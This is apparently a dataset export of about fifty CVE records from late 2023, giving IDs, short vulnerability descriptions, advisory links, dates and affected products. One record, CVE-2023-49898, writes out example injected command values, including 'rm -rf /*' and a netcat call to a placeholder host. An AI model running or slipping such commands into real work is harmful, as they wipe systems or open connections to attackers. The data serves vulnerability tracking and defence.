CVE_ID
stringlengths
9
213
Description
stringlengths
24
3.87k
URL
stringlengths
12
306
DateReserved
stringlengths
19
24
DatePublished
stringlengths
19
75
DateUpdated
stringlengths
19
61
AffectedProducts
stringlengths
46
143k
CVE-2023-49162
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress.This issue affects BigCommerce For WordPress: from n/a through 5.0.6.
https://patchstack.com/database/vulnerability/bigcommerce/wordpress-bigcommerce-for-wordpress-plugin-5-0-6-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve
2023-11-22T23:36:04.378Z
2023-12-21T13:55:31.215Z
2023-12-21T13:55:31.215Z
{'Vendor': 'BigCommerce', 'Product': 'BigCommerce For WordPress', 'Versions': 'n/a'}
CVE-2023-49898
In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3
2023-12-01T03:12:29.421Z
2023-12-15T12:13:25.086Z
2023-12-15T12:13:25.086Z
{'Vendor': 'Apache Software Foundation', 'Product': 'Apache StreamPark (incubating)', 'Versions': '2.0.0'}
CVE-2023-49877
IBM System Storage Virtualization Engine TS7700 3957-VEC, 3948-VED and 3957-VEC could allow a remote authenticated user to obtain sensitive information, caused by improper filtering of URLs. By submitting a specially crafted HTTP GET request, an attacker could exploit this vulnerability to view application source code, system configuration information, or other sensitive data related to the Management Interface. IBM X-Force ID: 272651.
https://www.ibm.com/support/pages/node/7092383
2023-12-01T01:47:32.862Z
2023-12-13T20:36:31.219Z
2023-12-13T20:36:31.219Z
{'Vendor': 'IBM', 'Product': 'System Storage Virtualization Engine', 'Versions': '8.52.103.23, 8.53.1.21'}
CVE-2023-49174
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS.This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5.
https://patchstack.com/database/vulnerability/responsive-lightbox/wordpress-responsive-lightbox-plugin-2-4-5-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-22T23:36:21.490Z
2023-12-15T14:14:22.560Z
2023-12-15T14:14:22.560Z
{'Vendor': 'dFactory', 'Product': 'Responsive Lightbox & Gallery', 'Versions': 'n/a'}
CVE-2023-49436
Tenda AX9 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'list' parameter at /goform/SetNetControlList.
https://github.com/ef4tless/vuln/blob/master/iot/AX9/SetNetControlList-2.md
2023-11-27T00:00:00
2023-12-07T00:00:00
2023-12-07T15:27:39.276335
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49123
A vulnerability has been identified in Solid Edge SE2023 (All versions < V223.0 Update 10). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.
https://cert-portal.siemens.com/productcert/pdf/ssa-589891.pdf
2023-11-22T14:43:13.524Z
2024-01-09T09:59:55.117Z
2024-01-09T09:59:55.117Z
{'Vendor': 'Siemens', 'Product': 'Solid Edge SE2023', 'Versions': 'All versions < V223.0 Update 10'}
CVE-2023-49089
Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.0, Backoffice users with permissions to create packages can use path traversal and thereby write outside of the expected location. Versions 8.18.10, 10.8.1, and 12.3.0 contain a patch for this issue.
https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-6324-52pr-h4p5
2023-11-21T18:57:30.429Z
2023-12-12T19:02:33.259Z
2023-12-12T19:02:33.259Z
{'Vendor': 'umbraco', 'Product': 'Umbraco-CMS', 'Versions': '>= 8.0.0, < 8.18.10, >= 9.0.0-rc001, < 10.8.1, >= 11.0.0-rc1, < 12.3.4'}
CVE-2023-49820
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS.This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3.
https://patchstack.com/database/vulnerability/structured-content/wordpress-structured-content-json-ld-wpsc-plugin-1-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-30T14:51:04.753Z
2023-12-14T15:53:36.806Z
2023-12-14T15:53:36.806Z
{'Vendor': 'Gordon Böhme, Antonio Leutsch', 'Product': 'Structured Content (JSON-LD) #wpsc', 'Versions': 'n/a'}
CVE-2023-49578
SAP Cloud Connector - version 2.0, allows an authenticated user with low privilege to perform Denial of service attack from adjacent UI by sending a malicious request which leads to low impact on the availability and no impact on confidentiality or Integrity  of the application.
https://me.sap.com/notes/3362463
2023-11-27T18:07:40.886Z
2023-12-12T01:08:32.245Z
2023-12-12T01:08:32.245Z
{'Vendor': 'SAP_SE', 'Product': 'SAP Cloud Connector', 'Versions': '2.0'}
CVE-2023-49082
aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request (e.g. insert a new header) or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if the attacker can control the HTTP method (GET, POST etc.) of the request. If the attacker can control the HTTP version of the request it will be able to modify the request (request smuggling). This issue has been patched in version 3.9.0.
https://github.com/aio-libs/aiohttp/security/advisories/GHSA-qvrw-v9rv-5rjx
2023-11-21T18:57:30.428Z
2023-11-29T20:07:29.341Z
2023-11-29T20:07:29.341Z
{'Vendor': 'aio-libs', 'Product': 'aiohttp', 'Versions': '< 3.9.0'}
CVE-2023-49128
A vulnerability has been identified in Solid Edge SE2023 (All versions < V223.0 Update 10). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted PAR file. This could allow an attacker to execute code in the context of the current process.
https://cert-portal.siemens.com/productcert/pdf/ssa-589891.pdf
2023-11-22T14:50:33.103Z
2024-01-09T10:00:00.630Z
2024-01-09T10:00:00.630Z
{'Vendor': 'Siemens', 'Product': 'Solid Edge SE2023', 'Versions': 'All versions < V223.0 Update 10'}
CVE-2023-49344
Temporary data passed between application components by Budgie Extras Window Shuffler applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.
https://github.com/UbuntuBudgie/budgie-extras/security/advisories/GHSA-rhwf-6fc9-9jvm
2023-11-27T03:17:52.865Z
2023-12-14T21:31:09.613Z
2023-12-14T21:31:09.613Z
{'Vendor': 'Ubuntu Budgie', 'Product': 'Budgie Extras', 'Versions': 'v1.4.0'}
CVE-2023-49190
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS.This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6.
https://patchstack.com/database/vulnerability/site-offline/wordpress-site-offline-or-coming-soon-or-maintenance-mode-plugin-1-5-6-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-22T23:36:56.848Z
2023-12-15T15:10:56.818Z
2023-12-15T15:10:56.818Z
{'Vendor': 'Chandra Shekhar Sahu', 'Product': 'Site Offline Or Coming Soon Or Maintenance Mode', 'Versions': 'n/a'}
CVE-2023-49485
JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the column management department.
https://github.com/Rabb1ter/cms/blob/main/There%20is%20a%20storage%20type%20XSS%20in%20the%20column%20management%20department.md
2023-11-27T00:00:00
2023-12-08T00:00:00
2023-12-08T15:08:57.838718
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49256
It is possible to download the configuration backup without authorization and decrypt included passwords using hardcoded static key.
https://cert.pl/en/posts/2024/01/CVE-2023-49253/
2023-11-24T11:53:46.294Z
2024-01-12T14:24:20.325Z
2024-01-12T14:24:20.325Z
{'Vendor': 'Hongdian', 'Product': 'H8951-4G-ESP', 'Versions': '0'}
CVE-2023-49743
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeff Starr Dashboard Widgets Suite allows Stored XSS.This issue affects Dashboard Widgets Suite: from n/a through 3.4.1.
https://patchstack.com/database/vulnerability/dashboard-widgets-suite/wordpress-dashboard-widgets-suite-plugin-3-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-30T13:21:40.736Z
2023-12-14T14:37:54.468Z
2023-12-14T14:37:54.468Z
{'Vendor': 'Jeff Starr', 'Product': 'Dashboard Widgets Suite', 'Versions': 'n/a'}
CVE-2023-49313
A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.
https://github.com/horsicq/XMachOViewer
2023-11-26T00:00:00
2023-11-28T00:00:00
2023-11-28T14:46:42.150992
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49169
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS.This issue affects Ads by datafeedr.Com: from n/a through 1.2.0.
https://patchstack.com/database/vulnerability/ads-by-datafeedrcom/wordpress-ads-by-datafeedr-com-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-22T23:36:21.489Z
2023-12-15T14:07:52.132Z
2023-12-15T14:07:52.132Z
{'Vendor': 'datafeedr.com', 'Product': 'Ads by datafeedr.com', 'Versions': 'n/a'}
CVE-2023-49493
DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the v parameter at selectimages.php.
https://github.com/Hebing123/cve/issues/2
2023-11-27T00:00:00
2023-12-07T00:00:00
2023-12-07T15:58:57.663852
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49240
Unauthorized access vulnerability in the launcher module. Successful exploitation of this vulnerability may affect service confidentiality.
https://consumer.huawei.com/en/support/bulletin/2023/12/
2023-11-24T07:33:47.174Z
2023-12-06T09:06:04.495Z
2023-12-06T09:06:04.495Z
{'Vendor': 'Huawei', 'Product': 'HarmonyOS', 'Versions': '4.0.0, 3.1.0, 3.0.0, 2.0.0'}
CVE-2023-49581
SAP GUI for Windows and SAP GUI for Java allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to write data to a database table. By doing so the attacker could increase response times of the AS ABAP, leading to mild impact on availability.
https://me.sap.com/notes/3392547
2023-11-27T18:07:40.886Z
2023-12-12T01:10:14.702Z
2024-01-16T13:56:46.654Z
{'Vendor': 'SAP_SE', 'Product': 'SAP NetWeaver Application Server ABAP and ABAP Platform', 'Versions': 'SAP_BASIS 700, SAP_BASIS731, SAP_BASIS740, SAP_BASIS750'}
CVE-2023-49094
Symbolicator is a symbolication service for native stacktraces and minidumps with symbol server support. An attacker could make Symbolicator send arbitrary GET HTTP requests to internal IP addresses by using a specially crafted HTTP endpoint. The response could be reflected to the attacker if they have an account on Sentry instance. The issue has been fixed in the release 23.11.2.
https://github.com/getsentry/symbolicator/security/advisories/GHSA-6576-pr6j-h9c6
2023-11-21T18:57:30.429Z
2023-11-30T04:49:37.404Z
2023-11-30T04:49:37.404Z
{'Vendor': 'getsentry', 'Product': 'symbolicator', 'Versions': '>= 0.3.3, < 23.11.2'}
CVE-2023-49647
Improper access control in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom SDKs for Windows before version 5.16.10 may allow an authenticated user to conduct an escalation of privilege via local access.
https://www.zoom.com/en/trust/security-bulletin/ZSB-24001/
2023-11-28T18:18:33.930Z
2024-01-12T21:44:00.743Z
2024-01-12T21:44:00.743Z
{'Vendor': 'Zoom Video Communications, Inc.', 'Product': 'Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom SDKs for Windows before version 5.16.10', 'Versions': 'before 5.16.0'}
CVE-2023-49846
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paul Bearne Author Avatars List/Block allows Stored XSS.This issue affects Author Avatars List/Block: from n/a through 2.1.17.
https://patchstack.com/database/vulnerability/author-avatars/wordpress-author-avatars-list-block-plugin-2-1-16-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-30T17:12:47.221Z
2023-12-14T14:07:15.503Z
2023-12-14T14:07:15.503Z
{'Vendor': 'Paul Bearne', 'Product': 'Author Avatars List/Block', 'Versions': 'n/a'}
CVE-2023-49145
Apache NiFi 0.7.0 through 1.23.2 include the JoltTransformJSON Processor, which provides an advanced configuration user interface that is vulnerable to DOM-based cross-site scripting. If an authenticated user, who is authorized to configure a JoltTransformJSON Processor, visits a crafted URL, then arbitrary JavaScript code can be executed within the session context of the authenticated user. Upgrading to Apache NiFi 1.24.0 or 2.0.0-M1 is the recommended mitigation.
https://nifi.apache.org/security.html#CVE-2023-49145
2023-11-22T19:51:06.932Z
2023-11-27T22:14:02.850Z
2023-11-27T22:14:02.850Z
{'Vendor': 'Apache Software Foundation', 'Product': 'Apache NiFi', 'Versions': '0.7.0'}
CVE-2023-49515
Insecure Permissiosn vulnerability in TP Link TC70 and C200 WIFI Camera v.3 firmware v.1.3.4 and fixed in v.1.3.11 allows a physically proximate attacker to obtain sensitive information via a connection to the UART pin components.
https://github.com/VineethKumarM/TAPO-TC70-Unauthorized-root-access-using-UART/tree/master
2023-11-27T00:00:00
2024-01-17T00:00:00
2024-01-17T01:53:28.775606
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49000
An issue in ArtistScope ArtisBrowser v.34.1.5 and before allows an attacker to bypass intended access restrictions via interaction with the com.artis.browser.IntentReceiverActivity component.
https://github.com/actuator/com.artis.browser/blob/main/CWE-94.md
2023-11-20T00:00:00
2023-12-27T00:00:00
2023-12-27T21:20:05.076759
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49779
Stored cross-site scripting vulnerability exists in the anchor tag of GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product.
https://weseek.co.jp/ja/news/2023/11/21/growi-prevent-xss6/
2023-12-07T02:39:53.189Z
2023-12-26T07:21:06.972Z
2023-12-26T07:21:06.972Z
{'Vendor': 'WESEEK, Inc.', 'Product': 'GROWI', 'Versions': 'prior to v6.0.0'}
CVE-2023-49283
microsoft-graph-core the Microsoft Graph Library for PHP. The Microsoft Graph Beta PHP SDK published packages which contained test code that enabled the use of the phpInfo() function from any application that could access and execute the file at `vendor/microsoft/microsoft-graph-core/tests/GetPhpInfo.php`. The phpInfo function exposes system information. The vulnerability affects the GetPhpInfo.php script of the PHP SDK which contains a call to the phpinfo() function. This vulnerability requires a misconfiguration of the server to be present so it can be exploited. For example, making the PHP application’s /vendor directory web accessible. The combination of the vulnerability and the server misconfiguration would allow an attacker to craft an HTTP request that executes the phpinfo() method. The attacker would then be able to get access to system information like configuration, modules, and environment variables and later on use the compromised secrets to access additional data. This problem has been patched in version 2.0.2. If an immediate deployment with the updated vendor package is not available, you can perform the following temporary workarounds: delete the `vendor/microsoft/microsoft-graph-core/tests/GetPhpInfo.php` file, remove access to the /vendor directory, or disable the phpinfo function
https://github.com/microsoftgraph/msgraph-sdk-php-core/security/advisories/GHSA-mhhp-c3cm-2r86
2023-11-24T16:45:24.312Z
2023-12-05T22:44:40.433Z
2023-12-05T22:44:40.433Z
{'Vendor': 'microsoftgraph', 'Product': 'msgraph-sdk-php-core', 'Versions': '< 2.0.2'}
CVE-2023-49329
Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3.
https://www.anomali.com/collaborate/ciso-blog
2023-11-27T00:00:00
2024-01-19T00:00:00
2024-01-19T20:28:02.855335
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49796
MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 contain a limited file write vulnerability in `file.py` Users should use MindsDB's `staging` branch or v23.11.4.1, which contain a fix for the issue.
https://github.com/mindsdb/mindsdb/security/advisories/GHSA-crhp-7c74-cg4c
2023-11-30T13:39:50.863Z
2023-12-11T20:38:25.330Z
2023-12-11T20:38:25.330Z
{'Vendor': 'mindsdb', 'Product': 'mindsdb', 'Versions': '< 23.11.4.1'}
CVE-2023-49954
The CRM Integration in 3CX before 18.0.9.23 and 20 before 20.0.0.1494 allows SQL Injection via a first name, search string, or email address.
https://cve-2023-49954.github.io/
2023-12-03T00:00:00
2023-12-25T00:00:00
2023-12-25T07:19:17.468212
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49684
null
null
2023-11-29T17:48:17.255Z
2023-12-21T23:12:28.842Z
2024-01-02T19:57:18.347Z
{'Vendor': 'NA', 'Product': 'NA', 'Versions': ''}
CVE-2023-49391
An issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message.
https://github.com/free5gc/free5gc/issues/497
2023-11-27T00:00:00
2023-12-22T00:00:00
2023-12-22T10:27:02.944413
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49807
Stored cross-site scripting vulnerability when processing the MathJax exists in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product.
https://weseek.co.jp/ja/news/2023/11/21/growi-prevent-xss6/
2023-12-07T02:39:44.808Z
2023-12-26T07:21:11.658Z
2023-12-26T07:21:11.658Z
{'Vendor': 'WESEEK, Inc.', 'Product': 'GROWI', 'Versions': 'prior to v6.0.0'}
CVE-2023-49104
An issue was discovered in ownCloud owncloud/oauth2 before 0.6.1, when Allow Subdomains is enabled. An attacker is able to pass in a crafted redirect-url that bypasses validation, and consequently allows an attacker to redirect callbacks to a Top Level Domain controlled by the attacker.
https://owncloud.org/security
2023-11-21T00:00:00
2023-11-21T00:00:00
2023-11-21T21:25:36.804365
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49554
Use After Free vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the do_directive function in the modules/preprocs/nasm/nasm-pp.c component.
https://github.com/yasm/yasm/issues/249
2023-11-27T00:00:00
2024-01-02T00:00:00
2024-01-02T23:09:23.560714
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49411
Tenda W30E V16.01.0.12(4843) contains a stack overflow vulnerability via the function formDeleteMeshNode.
https://github.com/GD008/TENDA/blob/main/w30e/tenda_w30e_deleteMesh/w30e_deleteMesh.md
2023-11-27T00:00:00
2023-12-07T00:00:00
2023-12-07T17:33:16.490776
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49738
An information disclosure vulnerability exists in the image404Raw.php functionality of WWBN AVideo dev master commit 15fed957fb. A specially crafted HTTP request can lead to arbitrary file read.
https://talosintelligence.com/vulnerability_reports/TALOS-2023-1881
2023-11-30T22:10:08.294Z
2024-01-10T15:48:11.922Z
2024-01-10T18:00:09.610Z
{'Vendor': 'WWBN', 'Product': 'AVideo', 'Versions': 'dev master commit 15fed957fb'}
CVE-2023-49692
A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions < V7.2.2), RUGGEDCOM RM1224 LTE(4G) NAM (All versions < V7.2.2), SCALANCE M804PB (All versions < V7.2.2), SCALANCE M812-1 ADSL-Router (Annex A) (All versions < V7.2.2), SCALANCE M812-1 ADSL-Router (Annex B) (All versions < V7.2.2), SCALANCE M816-1 ADSL-Router (Annex A) (All versions < V7.2.2), SCALANCE M816-1 ADSL-Router (Annex B) (All versions < V7.2.2), SCALANCE M826-2 SHDSL-Router (All versions < V7.2.2), SCALANCE M874-2 (All versions < V7.2.2), SCALANCE M874-3 (All versions < V7.2.2), SCALANCE M876-3 (EVDO) (All versions < V7.2.2), SCALANCE M876-3 (ROK) (All versions < V7.2.2), SCALANCE M876-4 (All versions < V7.2.2), SCALANCE M876-4 (EU) (All versions < V7.2.2), SCALANCE M876-4 (NAM) (All versions < V7.2.2), SCALANCE MUM853-1 (EU) (All versions < V7.2.2), SCALANCE MUM856-1 (EU) (All versions < V7.2.2), SCALANCE MUM856-1 (RoW) (All versions < V7.2.2), SCALANCE S615 (All versions < V7.2.2), SCALANCE S615 EEC (All versions < V7.2.2). An Improper Neutralization of Special Elements used in an OS Command with root privileges vulnerability exists in the parsing of the IPSEC configuration. This could allow malicious local administrators to issue commands on system level after a new connection is established.
https://cert-portal.siemens.com/productcert/pdf/ssa-068047.pdf
2023-11-29T17:51:25.463Z
2023-12-12T11:27:26.231Z
2023-12-12T11:27:26.231Z
{'Vendor': 'Siemens', 'Product': 'RUGGEDCOM RM1224 LTE(4G) EU', 'Versions': 'All versions < V7.2.2'}
CVE-2023-49153
Cross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon.This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0.
https://patchstack.com/database/vulnerability/woo-add-to-cart-text-change/wordpress-add-to-cart-text-changer-and-customize-button-add-custom-icon-plugin-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve
2023-11-22T23:35:38.290Z
2023-12-18T22:10:58.473Z
2023-12-18T22:10:58.473Z
{'Vendor': 'Saiful Islam', 'Product': 'Add to Cart Text Changer and Customize Button, Add Custom Icon', 'Versions': 'n/a'}
CVE-2023-49446
JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/nav/save.
https://github.com/ysuzhangbin/cms/blob/main/There%20is%20a%20CSRF%20in%20the%20newly%20added%20navigation%20management%20area.md
2023-11-27T00:00:00
2023-12-05T00:00:00
2023-12-05T14:57:22.327571
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49295
quic-go is an implementation of the QUIC protocol (RFC 9000, RFC 9001, RFC 9002) in Go. An attacker can cause its peer to run out of memory sending a large number of PATH_CHALLENGE frames. The receiver is supposed to respond to each PATH_CHALLENGE frame with a PATH_RESPONSE frame. The attacker can prevent the receiver from sending out (the vast majority of) these PATH_RESPONSE frames by collapsing the peers congestion window (by selectively acknowledging received packets) and by manipulating the peer's RTT estimate. This vulnerability has been patched in versions 0.37.7, 0.38.2 and 0.39.4.
https://github.com/quic-go/quic-go/security/advisories/GHSA-ppxx-5m9h-6vxf
2023-11-24T16:45:24.314Z
2024-01-10T21:40:58.881Z
2024-01-10T21:40:58.881Z
{'Vendor': 'quic-go', 'Product': 'quic-go', 'Versions': '= 0.40.0, >= 0.39.0, < 0.39.4, >= 0.38.0, < 0.38.2, < 0.37.7'}
CVE-2023-49061
An attacker could have performed HTML template injection via Reader Mode and exfiltrated user information. This vulnerability affects Firefox for iOS < 120.
https://bugzilla.mozilla.org/show_bug.cgi?id=1861420
2023-11-20T15:00:28.168Z
2023-11-21T14:28:55.728Z
2023-11-21T14:28:55.728Z
{'Vendor': 'Mozilla', 'Product': 'Firefox for iOS', 'Versions': 'unspecified'}
CVE-2023-49431
Tenda AX9 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'mac' parameter at /goform/SetOnlineDevName.
https://github.com/ef4tless/vuln/blob/master/iot/AX9/SetOnlineDevName.md
2023-11-27T00:00:00
2023-12-07T00:00:00
2023-12-07T16:02:45.878831
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49827
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme allows Reflected XSS.This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.
https://patchstack.com/database/vulnerability/soledad/wordpress-soledad-theme-8-4-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-30T15:27:45.875Z
2023-12-14T14:32:12.339Z
2023-12-14T14:32:12.339Z
{'Vendor': 'PenciDesign', 'Product': 'Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme', 'Versions': 'n/a'}
CVE-2023-49124
A vulnerability has been identified in Solid Edge SE2023 (All versions < V223.0 Update 10). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.
https://cert-portal.siemens.com/productcert/pdf/ssa-589891.pdf
2023-11-22T14:43:13.524Z
2024-01-09T09:59:56.361Z
2024-01-09T09:59:56.361Z
{'Vendor': 'Siemens', 'Product': 'Solid Edge SE2023', 'Versions': 'All versions < V223.0 Update 10'}
CVE-2023-49935
An issue was discovered in SchedMD Slurm 23.02.x and 23.11.x. There is Incorrect Access Control because of a slurmd Message Integrity Bypass. An attacker can reuse root-level authentication tokens during interaction with the slurmd process. This bypasses the RPC message hashes that protect against undesired MUNGE credential reuse. The fixed versions are 23.02.7 and 23.11.1.
https://www.schedmd.com/security-archive.php
2023-12-03T00:00:00
2023-12-14T00:00:00
2024-01-03T03:06:27.612392
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49173
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 10to8 Sign In Scheduling Online Appointment Booking System allows Stored XSS.This issue affects Sign In Scheduling Online Appointment Booking System: from n/a through 1.0.9.
https://patchstack.com/database/vulnerability/10to8-online-booking/wordpress-10to8-online-appointment-booking-system-plugin-1-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-22T23:36:21.489Z
2023-12-14T15:34:27.970Z
2023-12-14T15:34:27.970Z
{'Vendor': '10to8', 'Product': 'Sign In Scheduling Online Appointment Booking System', 'Versions': 'n/a'}
CVE-2023-49489
Reflective Cross Site Scripting (XSS) vulnerability in KodeExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php.
https://github.com/kalcaddle/KodExplorer/issues/526
2023-11-27T00:00:00
2023-12-19T00:00:00
2023-12-19T09:12:27.913009
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49759
Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team WooDiscuz – WooCommerce Comments.This issue affects WooDiscuz – WooCommerce Comments: from n/a through 2.3.0.
https://patchstack.com/database/vulnerability/woodiscuz-woocommerce-comments/wordpress-woodiscuz-woocommerce-comments-plugin-2-3-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve
2023-11-30T13:22:27.401Z
2023-12-18T22:19:52.358Z
2023-12-18T22:19:52.358Z
{'Vendor': 'gVectors Team', 'Product': 'WooDiscuz – WooCommerce Comments', 'Versions': 'n/a'}
CVE-2023-49923
An issue was discovered by Elastic whereby the Documents API of App Search logged the raw contents of indexed documents at INFO log level. Depending on the contents of such documents, this could lead to the insertion of sensitive or private information in the App Search logs. Elastic has released 8.11.2 and 7.17.16 that resolves this issue by changing the log level at which these are logged to DEBUG, which is disabled by default.
https://discuss.elastic.co/t/enterprise-search-8-11-2-7-17-16-security-update-esa-2023-31/349181
2023-12-02T16:06:57.310Z
2023-12-12T17:53:42.091Z
2023-12-12T17:53:42.091Z
{'Vendor': 'Elastic', 'Product': 'Enterprise Search', 'Versions': '7.0.0, 8.0.0'}
CVE-2023-49165
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Real Big Plugins Client Dash allows Stored XSS.This issue affects Client Dash: from n/a through 2.2.1.
https://patchstack.com/database/vulnerability/client-dash/wordpress-client-dash-plugin-2-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-11-22T23:36:04.378Z
2023-12-15T14:01:13.218Z
2023-12-15T14:01:13.218Z
{'Vendor': 'Real Big Plugins', 'Product': 'Client Dash', 'Versions': 'n/a'}
CVE-2023-49427
Buffer Overflow vulnerability in Tenda AX12 V22.03.01.46, allows remote attackers to cause a denial of service (DoS) via list parameter in SetNetControlList function.
https://github.com/ef4tless/vuln/blob/master/iot/AX12/SetNetControlList.md
2023-11-27T00:00:00
2024-01-10T00:00:00
2024-01-10T09:03:29.808129
{'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'}
CVE-2023-49077
Mailcow: dockerized is an open source groupware/email suite based on docker. A Cross-Site Scripting (XSS) vulnerability has been identified within the Quarantine UI of the system. This vulnerability poses a significant threat to administrators who utilize the Quarantine feature. An attacker can send a carefully crafted email containing malicious JavaScript code. This issue has been patched in version 2023-11.
https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-46x4-w2fm-5x6g
2023-11-21T18:57:30.427Z
2023-11-30T07:14:04.580Z
2023-11-30T07:14:04.580Z
{'Vendor': 'mailcow', 'Product': 'mailcow-dockerized', 'Versions': '< 2023-11'}
CVE-2023-49098
Discourse-reactions is a plugin that allows user to add their reactions to the post. Data about a user's reaction notifications could be exposed. This vulnerability was patched in commit 2c26939.
https://github.com/discourse/discourse-reactions/security/advisories/GHSA-mq82-7v5x-rhv8
2023-11-21T18:57:30.430Z
